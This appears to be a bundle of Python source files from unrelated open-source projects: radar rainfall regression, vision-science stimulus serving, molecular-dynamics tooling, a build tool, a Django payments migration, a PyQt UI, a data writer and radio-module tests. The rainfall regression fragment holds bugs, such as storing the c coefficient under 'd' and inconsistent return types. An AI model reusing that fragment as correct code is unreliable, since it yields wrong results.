"""Calculate a fit line to the linearly regressed data by
Create a linear array of independent reflectivity values. Calculate the dependent
Rainfall rate array using a power law distribution.
Optionally return a "test" array calculating the rainfall from the actual
reflectivity values via power law distribution.
This can then be used (with the SD_filter function).
to remove outlier data.
INPUT::
Z = Reflectivity [mm^6 m^-3]
slope = Slope of regression line
intercept = Intercept of the regression line
OPTIONAL
limLo = Lower limit of line
limHi = Upper limit of line
Rtest = Set True to return Rcalc "test" array
OUTPUT::
Zfit = Fit line of Z as the independent variable
Rfit = Fit line of R as the dependent variable
Rcalc = Optionally returned array of rainfall rate based upon input Z
USAGE::
Zfit, Rfit, [Rtest] = linreg(x,y)
NOTES::
The masked stats function is used, otherwise the regression is performed on
all data.
"""
#---------------------------------------
# Create the fit lines
Zfit = np.linspace(limLo,limHi,len(Z))
Rfit = (10.**intercept) * (Zfit**slope)
if Rtest:
Rcalc = (10.**intercept) * (Z**slope)
return Zfit,Rfit,Rcalc
else:
return Zfit,Rfit
#**====================================================
def SD_filter(Var,R,Rfit,Xsd):
"""Applies a filter to data at each point using the standard deviation
of the entire data series.
INPUT::
Var = Variable to be filtered
R = Rainfall rate [mm h^-1]
Xsd = Multiplication factor of Std Dev
OUTPUT::
VarFilt = Filtered input variable (masked)
USAGE::
VarOut = SD_filter(VarIn,R,Xsd)
NOTES::
This module assumes that the variable to be filtered is the same
dimensionality as the Rainfall rate variable.
"""
#---------------------------------------
# Find the standard deviation of scatter to remove outliers
sigDev = Xsd * R.std()
# Create the array for the filtered data
VarFilt = Var.copy()
# Apply the condition to mask the data
VarFilt = np.ma.masked_where((R <= (Rfit-sigDev)) | (R >= (Rfit+sigDev)),VarFilt,
copy=False)
return VarFilt
#**====================================================
def regfit_abcd(slope,intercept):
"""Calculate the a, b, c, d coefficients give the interept and slope,
assuming that reflectivity is the dependent variable
INPUT::
slope = Slope of regression line
intercept = Intercept of the regression line
OUTPUT::
a = a coefficient in Z = aR^b power law
b = b coefficient in Z = aR^b power law
c = c coefficient in R = cZ^d power law
d = d coefficient in R = cZ^d power law
USAGE::
a,b,c,d = fit_abcd(slope,intercept)
NOTES::
This method assumes that reflectivity (Z) was the independent variable and
Rainfall rate (R) was the dependent variable during linear regression.
"""
#---------------------------------------
# Calculate a, b, c, and d coefficients
c = 10.**intercept
d = slope
a = (1./c)**(1./d)
b = (1./d)
return a,b,c,d
#**====================================================
def get_zr_linreg(Z,R,filter=False,SDmult=1.,limLo=1E-2,limHi=1E6):
"""Use linear regression to solve find a Z-R relationship
INPUT::
Z = Reflectivity [mm^6 m^-3]
R = Rainfall rate [mm h^-1]
OPTIONAL::
filter = Set True to also return filtered a,b,c,d
SDmult = Multiplier for Standard deviation filter (if 3; then 3 * Std Dev)
limLo = Lower limit of line
limHi = Upper limit of line
See the printout for details of inputs
OUTPUT::
a = a coefficient in Z = aR^b power law
b = b exponent in Z = aR^b power law
c = c coefficient in R = cZ^d power law
d = d exponent in R = cZ^d power law
USAGE::
zr.save_stats(fname,[**args])
"""
#---------------------------------------
# Calculate a least squares linear regression fit of log-log distribution
Regslp, RegInt, rVal, pVal, stdErr = linreg(Z,R)
# Assign values from linear regression for coefficients
a_all,b_all,c_all,d_all = regfit_abcd(Regslp,RegInt)
# Apply a filter if requested
if filter:
# Line fits for independent Z (linear array) and dependent R via power law relationship
# The Rtest = true returns the test array (power law) for next filtering step
Zfit, RegFit, RRtest = regfit_powerlaw(Z,Regslp,RegInt,limLo=limLo,limHi=limHi,Rtest=True)
#mask = (R >= (RRtest-sigDev)) & (R <= (RRtest+sigDev))
# Filter the arrays within specified std deviation
Z_filt = SD_filter(Z,R,RRtest,SDmult)
R_filt = SD_filter(R,R,RRtest,SDmult)
# Calculate the least squares linear regression fit of log-log distribution of filtered data
RegslpFilt, RegIntFilt, rValFilt, pValFilt, stdErrFilt = linreg(Z_filt,R_filt)
# Create an array for line fit using power law for filtered data
ZfitFilt, RegFitFilt = regfit_powerlaw(Z,RegslpFilt,RegIntFilt,Rtest=False)
del ZfitFilt
a_filt,b_filt,c_filt,d_filt = regfit_abcd(RegslpFilt,RegIntFilt)
# Find the number of elements in the filtered array
nPts = R_filt.count()
Info = 'Filtered'
a, b, c, d, nPts = a_filt, b_filt, c_filt, d_filt, nPts
return a_filt,b_filt,c_filt,d_filt,nPts
else:
# Find the number of elements in the array
nPts = len(R)
Info = 'NonFiltered'
a, b, c, d, nPts = a_all, b_all, c_all, d_all, nPts
# Create a dictionary to transfer the data
data = {'Mode' : Info,
'a' : a,
'b' : b,
'c' : c,
'd' : c,
'number_pts' : nPts
}
return data
#**====================================================
def save_stats(fname,title=None,Conc=None,nPtsAll=None,cFactAll=None,dFactAll=None,aFactAll=None,
bFactAll=None,nPtsFilt=None,cFactFilt=None,dFactFilt=None,aFactFilt=None,
bFactFilt=None,rValAll=None,pValAll=None,stdErrAll=None,rValFilt=None,
pValFilt=None,stdErrFilt=None,Nw=None,
D0=None,Nw_D0_cst=None,W=None):
"""Save a text file with output stats calculated from Z-R relationship calculations
INPUT::
fname = Name out output file
title = Title information to identify statistics
OPTIONAL::
See the printout for details of inputs
OUTPUT::
fname = Text file
USAGE::
zr.save_stats(fname,[**args])
"""
#---------------------------------------
# Create a single element needed to save file
empty = [0.]
ZRstatsTex = "=======================================\n"
ZRstatsTex += "**** "+fname+" ****\n"
ZRstatsTex += "DROP SIZE DISTRIBUTION CONCENTRATION\n"
ZRstatsTex += "min Conc = " + str(Conc.min())+"\n"
ZRstatsTex += "max Conc = " + str(Conc.max())+"\n"
ZRstatsTex += "=======================================\n"
ZRstatsTex += " \n"
ZRstatsTex += title+"\n"
ZRstatsTex += "========================================\n"
ZRstatsTex += "PREFACTOR AND EXPONENT ESTIMATION\n"
ZRstatsTex += "All Data: R=cZ^d:: c = "+str(cFactAll)+" , d = "+str(dFactAll)+"\n"
ZRstatsTex += " Z=aR^b:: a = "+str(aFactAll)+" , b = "+str(bFactAll)+"\n"
ZRstatsTex += " Correlation = "+str(rValAll)+" p = "+str(pValAll)+" StdErr = "+str(stdErrAll)+"\n"
ZRstatsTex += " # Points = "+str(nPtsAll)+"\n"
ZRstatsTex += " -----------------\n"
ZRstatsTex += "Filtered Data: R=cZ^d:: c = "+str(cFactFilt)+" , d = "+str(dFactFilt)+"\n"
ZRstatsTex += " Z=aR^b:: a = "+str(aFactFilt)+" , b = "+str(bFactFilt)+"\n"
ZRstatsTex += " Correlation = "+str(rValFilt)+" p = "+str(pValFilt)+" StdErr = "+str(stdErrFilt)+"\n"
ZRstatsTex += " # Points = "+str(nPtsFilt)+"\n"
ZRstatsTex += "=========================================\n"
ZRstatsTex += " \n"
ZRstatsTex += "==============================================\n"
ZRstatsTex += " \n"
ZRstatsTex += "Bringi et al. 2009, Conv-Strat-Trans\n"
ZRstatsTex += "Stratiform: "+str(len(Nw_D0_cst[Nw_D0_cst == 1]))+" points"+"\n"
ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 1].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 1].std()))+"\n"
ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 1].mean())+", SD = "+str(D0[Nw_D0_cst == 1].std())+"\n"
ZRstatsTex += "================================\n"
ZRstatsTex += "Convective: "+str(len(Nw_D0_cst[Nw_D0_cst == 2]))+" points"+"\n"
ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 2].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 2].std()))+"\n"
ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 2].mean())+", SD = "+str(D0[Nw_D0_cst == 2].std())+"\n"
ZRstatsTex += "=================================\n"
ZRstatsTex += "Transition: "+str(len(Nw_D0_cst[Nw_D0_cst == 3]))+" points"+"\n"
ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 3].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 3].std()))+"\n"
ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 3].mean())+", SD = "+str(D0[Nw_D0_cst == 3].std())+"\n"
ZRstatsTex += "=================================\n"
# ZRstatsTex += "Mean W = "+str(W[Nw_D0_cs == 2].mean())+", SD = "+str(W[Nw_D0_cs == 2].std())+"\n"
ZRstatsTex += "==============================================\n"
ZRstatsTex += " \n"
# Save the file
np.savetxt(fname, empty, header=ZRstatsTex)
#====================================================
|
visionegg/visionegg
|
VisionEgg/PyroApps/SphereGratingServer.py
|
#!/usr/bin/env python
"""Handle perspective-distorted sinusoidal gratings (server-side)"""
# Copyright (c) 2002-2003 Andrew Straw. Distributed under the terms
# of the GNU Lesser General Public License (LGPL).
import VisionEgg, string
import sys, os, math
import VisionEgg.Core
import VisionEgg.FlowControl
import VisionEgg.SphereMap
import VisionEgg.PyroHelpers
import Pyro.core
from VisionEgg.PyroApps.ScreenPositionServer import ScreenPositionMetaController
from VisionEgg.PyroApps.ScreenPositionGUI import ScreenPositionParameters
from VisionEgg.PyroApps.SphereGratingGUI import SphereGratingMetaParameters
class SphereGratingExperimentMetaController( Pyro.core.ObjBase ):
def __init__(self,screen,presentation,stimuli):
# get stimuli
assert( stimuli[0][0] == '3d_perspective')
assert( stimuli[1][0] == '3d_perspective')
sphere_grating = stimuli[0][1]
sphere_window = stimuli[1][1]
Pyro.core.ObjBase.__init__(self)
self.meta_params = SphereGratingMetaParameters()
if not isinstance(screen,VisionEgg.Core.Screen):
raise ValueError("Expecting instance of VisionEgg.Core.Screen")
if not isinstance(presentation,VisionEgg.FlowControl.Presentation):
raise ValueError("Expecting instance of VisionEgg.FlowControl.Presentation")
if not isinstance(sphere_grating,VisionEgg.SphereMap.SphereGrating):
raise ValueError("Expecting instance of VisionEgg.SphereMap.SphereGrating")
if not isinstance(sphere_window,VisionEgg.SphereMap.SphereWindow):
raise ValueError("Expecting instance of VisionEgg.SphereMap.SphereWindow")
self.p = presentation
self.stim = sphere_grating
self.window = sphere_window
screen.parameters.bgcolor = (0.5, 0.5, 0.5, 0.0)
self.p.add_controller(self.stim,'on',VisionEgg.FlowControl.FunctionController(
during_go_func=self.on_function_during_go,
between_go_func=self.on_function_between_go))
def __del__(self):
self.p.remove_controller(self.stim,'on')
Pyro.core.ObjBase.__del__(self) # call base class
def on_function_during_go(self,t):
"""Compute when the grating is on"""
if t <= self.meta_params.pre_stim_sec:
return 0 # not on yet
elif t <= (self.meta_params.pre_stim_sec + self.meta_params.stim_sec):
return 1 # on
else:
return 0 # off again
def on_function_between_go(self):
"""Compute when the grating is off"""
return 0 # off again
def get_parameters(self):
return self.meta_params
def set_parameters(self, new_parameters):
if isinstance(new_parameters, SphereGratingMetaParameters):
self.meta_params = new_parameters
else:
raise ValueError("Argument to set_parameters must be instance of SphereGratingMetaParameters")
# self.meta_params = new_parameters
self.update()
def update(self):
stim_params = self.stim.parameters # shorthand
window_params = self.window.parameters # shorthand
meta_params = self.meta_params # shorthand
stim_params.contrast = meta_params.contrast
stim_params.orientation = meta_params.orient
stim_params.spatial_freq_cpd = meta_params.sf
stim_params.temporal_freq_hz = meta_params.tf
stim_params.grating_center_azimuth = meta_params.window_az
stim_params.grating_center_elevation = meta_params.window_el
self.p.parameters.go_duration = ( meta_params.pre_stim_sec + meta_params.stim_sec + meta_params.post_stim_sec, 'seconds')
window_params.window_shape = meta_params.window_func
window_params.window_shape_radius_parameter = meta_params.window_radius
window_params.window_center_azimuth = meta_params.window_az
window_params.window_center_elevation = meta_params.window_el
def go(self):
self.p.parameters.enter_go_loop = 1
def quit_server(self):
self.p.parameters.quit = 1
def get_meta_controller_class():
return SphereGratingExperimentMetaController
def make_stimuli():
stimulus = VisionEgg.SphereMap.SphereGrating(radius=1.0,
spatial_freq_cpd=1.0/9.0,
temporal_freq_hz = 1.0)
mask = VisionEgg.SphereMap.SphereWindow(radius=0.95)
return [('3d_perspective',stimulus),('3d_perspective',mask)]
def get_meta_controller_stimkey():
return "sphere_grating_server"
# Don't do anything unless this script is being run
if __name__ == '__main__':
pyro_server = VisionEgg.PyroHelpers.PyroServer()
screen = VisionEgg.Core.Screen.create_default()
# get Vision Egg stimulus ready to go
stimuli = make_stimuli()
stimulus = stimuli[0][1]
mask = stimuli[1][1]
temp = ScreenPositionParameters()
left = temp.left
right = temp.right
bottom = temp.bottom
top = temp.top
near = temp.near
far = temp.far
projection = VisionEgg.Core.PerspectiveProjection(left,
right,
bottom,
top,
near,
far)
viewport = VisionEgg.Core.Viewport(screen=screen,stimuli=[stimulus,mask],projection=projection)
p = VisionEgg.FlowControl.Presentation(viewports=[viewport])
# now hand over control of projection to ScreenPositionMetaController
projection_controller = ScreenPositionMetaController(p,projection)
pyro_server.connect(projection_controller,"projection_controller")
# now hand over control of grating and mask to SphereGratingExperimentMetaController
meta_controller = SphereGratingExperimentMetaController(screen,p,stimuli)
pyro_server.connect(meta_controller,get_meta_controller_stimkey())
# get listener controller and register it
p.add_controller(None,None, pyro_server.create_listener_controller())
# enter endless loop
p.run_forever()
|
CMD-at-ZIB/ZIBMolPy
|
tools/zgf_concatenate_stuff.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
What it does
============
This tool concatenates trr and edr files for unrestrained nodes as well as multistart nodes.
Please note: This functionality has also been integrated into zgf_mdrun. This tool is merely meant to provide this function for older node pools.
How it works
============
At the command line, type::
$ zgf_concatentate_stuff
"""
from ZIBMolPy.utils import check_call
from ZIBMolPy.pool import Pool
from ZIBMolPy.ui import Option, OptionsList
from ZIBMolPy.io.trr import TrrFile
import sys
import os
import re
import numpy as np
from subprocess import Popen, PIPE
options_desc = OptionsList([
Option("t", "trr", "bool", "concatenate trr files", default=False),
Option("e", "edr", "bool", "concatenate edr files", default=False),
])
sys.modules[__name__].__doc__ += options_desc.epytext() # for epydoc
def is_applicable():
pool = Pool()
return( len(pool.where("state == 'merge-able'")) > 0 )
#===============================================================================
def main():
options = options_desc.parse_args(sys.argv)[0]
pool = Pool()
needy_nodes = pool.where("state == 'merge-able'").multilock()
if(len(needy_nodes) == 0):
return
# find out about trr time step
dt = 0
nodeDir = needy_nodes[0].dir.split('/')[-1]
for fn in os.listdir(needy_nodes[0].dir):
if re.match("^"+nodeDir+".+run\d+\.trr", fn):
trr = TrrFile(needy_nodes[0].dir+"/"+fn)
dt = trr.first_frame.next().t - trr.first_frame.t
trr.close()
break
# dt is sometimes noisy in the final digits (three digits is femtosecond step = enough)
dt = np.around(dt, decimals=3)
for n in needy_nodes:
if(options.trr):
# merge sampling trajectories
trr_fns = sorted([ fn for fn in os.listdir(n.dir) if re.match("[^#].+run\d+.trr", fn) ])
cmd = ["trjcat", "-f"]
cmd += trr_fns
cmd += ["-o", "../../"+n.trr_fn, "-cat"]
print("Calling: %s"%" ".join(cmd))
check_call(cmd, cwd=n.dir)
if(options.edr):
# merge edr files
# get list of edr-files
edr_fnames = sorted([n.dir+"/"+fn for fn in os.listdir(n.dir) if re.match("[^#].+run\d+.edr", fn)])
assert( len(edr_fnames) == n.extensions_counter+1 )
assert( len(edr_fnames) == n.extensions_max+1 )
time_offset = n.sampling_length+dt
for edr_fn in edr_fnames[1:]:
# adapt edr starting times
cmd = ["eneconv", "-f", edr_fn, "-o", edr_fn, "-settime"]
print("Calling: "+(" ".join(cmd)))
p = Popen(cmd, stdin=PIPE)
p.communicate(input=(str(time_offset)+"\n"))
assert(p.wait() == 0)
time_offset += n.extensions_length+dt
# concatenate edr files with adapted starting times
cmd = ["eneconv", "-f"] + edr_fnames + ["-o", n.dir+"/ener.edr"]
print("Calling: "+(" ".join(cmd)))
p = Popen(cmd)
retcode = p.wait()
assert(retcode == 0)
needy_nodes.unlock()
#===============================================================================
if(__name__ == "__main__"):
main()
#EOF
|
dlu-ch/dlb
|
src/dlb/ex/input.py
|
# SPDX-License-Identifier: LGPL-3.0-or-later
# dlb - a Pythonic build tool
# Copyright (C) 2020 Daniel Lutz <dlu-ch@users.noreply.github.com>
"""Input dependency classes for tools."""
import re
import dataclasses
from typing import Dict, Pattern, Union
from . import _depend
class RegularFile(_depend.NonDirectoryMixin, _depend.InputDependency):
pass
class NonRegularFile(_depend.NonDirectoryMixin, _depend.InputDependency):
pass
class Directory(_depend.DirectoryMixin, _depend.InputDependency):
pass
class EnvVar(_depend.InputDependency):
@dataclasses.dataclass(frozen=True, eq=True)
class Value:
name: str
raw: str
groups: Dict[str, str]
def __init__(self, *, name: str, pattern: Union[str, Pattern], example: str, **kwargs):
super().__init__(**kwargs)
if not isinstance(name, str):
raise TypeError("'name' must be a str")
if not name:
raise ValueError("'name' must not be empty")
if isinstance(pattern, str):
pattern = re.compile(pattern)
if not isinstance(pattern, Pattern):
raise TypeError("'pattern' must be regular expression (compiled or str)")
if not isinstance(example, str):
raise TypeError("'example' must be a str")
if not pattern.fullmatch(example):
raise ValueError(f"'example' is not matched by 'pattern': {example!r}")
if self.multiplicity is not None:
raise ValueError("must not have a multiplicity")
self._name = name
self._pattern: Pattern = pattern
self._example = example
@property
def name(self) -> str:
return self._name
@property
def pattern(self) -> Pattern:
return self._pattern
@property
def example(self) -> str:
return self._example
def compatible_and_no_less_restrictive(self, other) -> bool:
if not super().compatible_and_no_less_restrictive(other):
return False
return self.name == other.name and self.pattern == other.pattern # ignore example
def validate_single(self, value) -> 'EnvVar.Value':
# value is used to defined the content of a (future) environment variable
value = super().validate_single(value)
if not isinstance(value, str):
raise TypeError("'value' must be a str")
m = self._pattern.fullmatch(value)
if not m:
raise ValueError(f"value {value!r} is not matched by validation pattern {self._pattern.pattern!r}")
# noinspection PyCallByClass
return EnvVar.Value(name=self.name, raw=value, groups=m.groupdict())
|
gitaarik/adyengo
|
adyengo/migrations/0007_auto_20160527_2341.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-27 21:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('adyengo', '0006_auto_20160527_2051'),
]
operations = [
migrations.AlterField(
model_name='notification',
name='currency_code',
field=models.CharField(choices=[('EUR', 'Euro')], default='EUR', max_length=3),
),
migrations.AlterField(
model_name='notification',
name='event_code',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='notification',
name='event_date',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='notification',
name='ip_address',
field=models.CharField(blank=True, max_length=45, null=True),
),
migrations.AlterField(
model_name='notification',
name='merchant_account_code',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='notification',
name='merchant_reference',
field=models.CharField(blank=True, max_length=128, null=True),
),
migrations.AlterField(
model_name='notification',
name='operations',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='notification',
name='original_reference',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='notification',
name='payment_method',
field=models.CharField(blank=True, choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50, null=True),
),
migrations.AlterField(
model_name='notification',
name='psp_reference',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='notification',
name='reason',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AlterField(
model_name='notification',
name='session',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='adyengo.Session'),
),
migrations.AlterField(
model_name='recurringpaymentresult',
name='result_code',
field=models.CharField(choices=[('Error', 'Error'), ('Refused', 'Refused'), ('Authorised', 'Authorised')], max_length=30),
),
migrations.AlterField(
model_name='session',
name='country_code',
field=models.CharField(blank=True, choices=[('BE', 'Belgium'), ('GB', 'United Kingdom'), ('DE', 'Germany'), ('NL', 'Netherlands')], max_length=2),
),
migrations.AlterField(
model_name='session',
name='currency_code',
field=models.CharField(choices=[('EUR', 'Euro')], default='EUR', max_length=3),
),
migrations.AlterField(
model_name='session',
name='page_type',
field=models.CharField(choices=[('multiple', 'Multiple'), ('skip', 'Skip'), ('single', 'Single')], default='multiple', max_length=15),
),
migrations.AlterField(
model_name='session',
name='recurring_contract',
field=models.CharField(blank=True, choices=[('ONECLICK', 'One click'), ('RECURRING,ONECLICK', 'Recurring and One click (user chooses)'), ('RECURRING', 'Recurring')], max_length=50),
),
migrations.AlterField(
model_name='session',
name='session_type',
field=models.CharField(choices=[('api_recurring', 'API Recurring'), ('hpp_regular', 'HPP Regular'), ('hpp_recurring', 'HPP Recurring')], max_length=25),
),
migrations.AlterField(
model_name='session',
name='shopper_locale',
field=models.CharField(blank=True, choices=[('nl_NL', 'Dutch (Holland)'), ('en_GB', 'English (United Kingdom)'), ('de_DE', 'German (Germany)'), ('nl_BE', 'Dutch (Belgium)'), ('fr_BE', 'French (Belgium)')], default='nl_NL', max_length=5),
),
migrations.AlterField(
model_name='session',
name='skin_code',
field=models.CharField(default='BCS1MHG2', max_length=10),
),
migrations.AlterField(
model_name='sessionallowedpaymentmethods',
name='method',
field=models.CharField(choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50),
),
migrations.AlterField(
model_name='sessionblockedpaymentmethods',
name='method',
field=models.CharField(choices=[('bankTransfer_DE', 'German Banktransfer'), ('directEbanking', 'SofortUberweisung'), ('paypal', 'PayPal'), ('amex', 'Amex'), ('bankTransfer', 'All banktransfers'), ('mc', 'Master Card'), ('bankTransfer_NL', 'Dutch Banktransfer'), ('visa', 'Visa'), ('ideal', 'iDEAL'), ('card', 'All debit and credit cards'), ('elv', 'ELV'), ('directdebit_NL', 'Direct Debit (Netherlands)')], max_length=50),
),
]
|
danielhrisca/asammdf
|
asammdf/gui/ui/fft_window.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'fft_window.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FFTWindow(object):
def setupUi(self, FFTWindow):
FFTWindow.setObjectName("FFTWindow")
FFTWindow.resize(640, 480)
self.centralwidget = QtWidgets.QWidget(FFTWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.start_frequency = QtWidgets.QDoubleSpinBox(self.centralwidget)
self.start_frequency.setDecimals(3)
self.start_frequency.setMinimum(0.001)
self.start_frequency.setMaximum(1000000.0)
self.start_frequency.setProperty("value", 1.0)
self.start_frequency.setObjectName("start_frequency")
self.verticalLayout.addWidget(self.start_frequency)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.end_frequency = QtWidgets.QDoubleSpinBox(self.centralwidget)
self.end_frequency.setDecimals(3)
self.end_frequency.setMinimum(0.001)
self.end_frequency.setMaximum(1000000.0)
self.end_frequency.setProperty("value", 1000.0)
self.end_frequency.setObjectName("end_frequency")
self.verticalLayout.addWidget(self.end_frequency)
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.frequency_step = QtWidgets.QDoubleSpinBox(self.centralwidget)
self.frequency_step.setDecimals(3)
self.frequency_step.setMinimum(0.001)
self.frequency_step.setMaximum(1000000.0)
self.frequency_step.setProperty("value", 1.0)
self.frequency_step.setObjectName("frequency_step")
self.verticalLayout.addWidget(self.frequency_step)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout.addLayout(self.verticalLayout)
self.layout = QtWidgets.QVBoxLayout()
self.layout.setObjectName("layout")
self.horizontalLayout.addLayout(self.layout)
self.horizontalLayout.setStretch(1, 1)
FFTWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(FFTWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
self.menubar.setObjectName("menubar")
FFTWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(FFTWindow)
self.statusbar.setObjectName("statusbar")
FFTWindow.setStatusBar(self.statusbar)
self.retranslateUi(FFTWindow)
QtCore.QMetaObject.connectSlotsByName(FFTWindow)
def retranslateUi(self, FFTWindow):
_translate = QtCore.QCoreApplication.translate
FFTWindow.setWindowTitle(_translate("FFTWindow", "MainWindow"))
self.label_2.setText(_translate("FFTWindow", "Start frequency"))
self.start_frequency.setSuffix(_translate("FFTWindow", "Hz"))
self.label.setText(_translate("FFTWindow", "End frequency"))
self.end_frequency.setSuffix(_translate("FFTWindow", "Hz"))
self.label_3.setText(_translate("FFTWindow", "Frequency step"))
self.frequency_step.setSuffix(_translate("FFTWindow", "Hz"))
|
pjohansson/flowtools-rewrite
|
strata/dataformats/write.py
|
import strata.dataformats as formats
"""Module for outputting data."""
# Set module handles for ftype
default_module = formats.simple.main
modules = {
'default': default_module,
'simple': formats.simple.main,
'simple_plain': formats.simple.main
}
def write(path, data, *args, **kwargs):
"""Output data to a path.
This function selects a default module to use for output and calls
its 'write_data' function. The module can be selected explicitly
using the keyword argument 'ftype'.
Arguments and keyword arguments are passed on to the functions.
Args:
path (str): Write to a file at this path.
data (dict): Data to write.
Keyword Args:
ftype (str, default='simple'): File type to write. Choices:
'simple' - Simple binary (strata.dataformats.simple)
'simple_plain' - Simple plaintext (strata.dataformats.simple)
Raises:
KeyError: If a non-existant 'ftype' is specified.
"""
def write_simple(ftype):
if ftype == 'simple_plain':
kwargs.update({'binary': False})
modules[ftype].write_data(path, data, *args, **kwargs)
ftype = kwargs.pop('ftype', 'default')
try:
assert (ftype in modules.keys())
except AssertionError:
raise KeyError("specified 'ftype' not existing for writing.")
write_simple(ftype)
def flowdata_to_dict(flow):
"""Convert a FlowData object to write-compatible dictionary.
Args:
flow (FlowData): Object to convert.
Returns:
dict: Data to write.
"""
return {key: flow.data[key] for key in flow.data.dtype.names}
|
laurentb/weboob
|
modules/radiofrance/test.py
|
# -*- coding: utf-8 -*-
# Copyright(C) 2011-2012 Romain Bignon, Laurent Bachelier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
from weboob.capabilities.audio import BaseAudio
from weboob.capabilities.radio import Radio
import itertools
class RadioFranceTest(BackendTest):
MODULE = 'radiofrance'
def test_ls_radios_and_selections(self):
l = list(self.backend.iter_resources(objs=[Radio], split_path=[]))
self.assertTrue(0 < len(l) < 30)
for radio in l:
name = radio.split_path[-1]
if name != 'francebleu':
streams = self.backend.get_radio(name).streams
self.assertTrue(len(streams) > 0)
l_sel = list(self.backend.iter_resources(objs=[BaseAudio], split_path=[name, 'selection']))
if len(l_sel) > 0:
self.assertTrue(len(l_sel[0].url) > 0)
l = list(self.backend.iter_resources(objs=[Radio], split_path=['francebleu']))
self.assertTrue(len(l) > 30)
for radio in l:
streams = self.backend.get_radio(radio.split_path[-1]).streams
self.assertTrue(len(streams) > 0)
l_sel1 = list(self.backend.iter_resources(objs=[BaseAudio],
split_path=['francebleu',
radio.split_path[-1]]))
if 'Selection' in [el.title for el in l_sel1]:
l_sel = list(self.backend.iter_resources(objs=[BaseAudio],
split_path=['francebleu',
radio.split_path[-1],
'selection']))
if len(l_sel) > 0:
self.assertTrue(len(l_sel[0].url) > 0)
def test_podcasts(self):
for key, item in self.backend._RADIOS.items():
if 'podcast' in item:
emissions = list(self.backend.iter_resources(objs=[BaseAudio], split_path=[key, 'podcasts']))
self.assertTrue(len(emissions) > 0)
podcasts = list(self.backend.iter_resources(objs=[BaseAudio], split_path=emissions[0].split_path))
self.assertTrue(len(podcasts) > 0)
podcast = self.backend.get_audio(podcasts[0].id)
self.assertTrue(podcast.url)
def test_search_radio(self):
l = list(self.backend.iter_radios_search('bleu'))
self.assertTrue(len(l) > 0)
self.assertTrue(len(l[0].streams) > 0)
def test_search_get_audio(self):
l = list(itertools.islice(self.backend.search_audio('jou'), 0, 20))
self.assertTrue(len(l) > 0)
a = self.backend.get_audio(l[0].id)
self.assertTrue(a.url)
|
lixiangning888/whole_project
|
modules/signatures_orginal_20151110/browser_security.py
|
# Copyright (C) 2015 Kevin Ross, Optiv, Inc. (brad.spengler@optiv.com)
#
